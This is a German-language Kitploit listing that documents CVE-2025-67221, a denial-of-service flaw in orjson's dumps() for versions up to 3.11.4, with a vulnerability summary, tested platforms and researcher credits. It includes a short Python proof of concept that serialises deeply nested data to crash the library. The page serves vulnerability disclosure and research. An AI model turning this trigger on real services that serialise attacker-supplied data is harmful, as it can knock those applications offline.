Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-67221 — Dokumentation und Reproduktionscode für CVE-2025-67221, eine Denial-of-Service-Sicherheitslücke in der dumps()-Funktion von orjson, die durch unkontrollierte Rekursion beim Serialisieren tief verschachtelter JSON-Daten verursacht wird. | Kitploit
Tools/GitHubGitHub/kpatsakis/cve-2025-67221
SchwachstellenanalyseCode-AnalysePapers & ForschungLernen & Bildung
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

Dokumentation und Reproduktionscode für CVE-2025-67221, eine Denial-of-Service-Sicherheitslücke in der dumps()-Funktion von orjson, die durch unkontrollierte Rekursion beim Serialisieren tief verschachtelter JSON-Daten verursacht wird.

Repository anzeigen
112vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-67221

Zusammenfassung der Schwachstelle

FeldWert
CVE IDCVE-2025-67221
Betroffenes Produktorjson
Betroffene Versionen≤ 3.11.4
Art der VerwundbarkeitDenial of Service (Unkontrollierte Rekursion)
AngriffsvektorRemote (wenn Angreifer serialisierte Daten kontrolliert)

Beschreibung

Eine Denial-of-Service-Schwachstelle existiert in der Funktion orjson.dumps() in orjson-Versionen 3.11.4 und früher. Die Funktion erzwingt keine Rekursionsgrenze beim Serialisieren von tief verschachtelten JSON-Datenstrukturen. Ein Angreifer, der dazu führen kann, dass eine Anwendung angreiferkontrollierte verschachtelte Daten serialisiert, kann einen Absturz der Serialisierungsroutine auslösen.

Betroffene Funktion

  • Funktion: orjson.dumps()
  • Datei: pysrc/orjson/__init__.pyi

Tests

Getestet auf

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 auf Ubuntu Linux kernel 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Education 10.0.26200 Build 26200

Auswirkungen

Anwendungen, die orjson zum Serialisieren von nicht vertrauenswürdigen oder angreiferkontrollierten Datenstrukturen verwenden, können anfällig für Denial-of-Service-Angriffe sein.

Reproduktionscode

Code zum lokalen Reproduzieren der Schwachstelle:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

Demo

Der obige Code führt zu einem schönen Core Dump Demo

Autoren / Forscher

  • Constantinos Patsakis, Department of Informatics, University of Piraeus, Griechenland
  • Evgenios Gkritsis, Department of Informatics, Athens University of Economics and Business, Griechenland
  • George Stergiopoulos, Department of Informatics, Athens University of Economics and Business, Griechenland

Referenzen

  • https://github.com/ijl/orjson (Betroffenes Projekt)
Tool herunterladen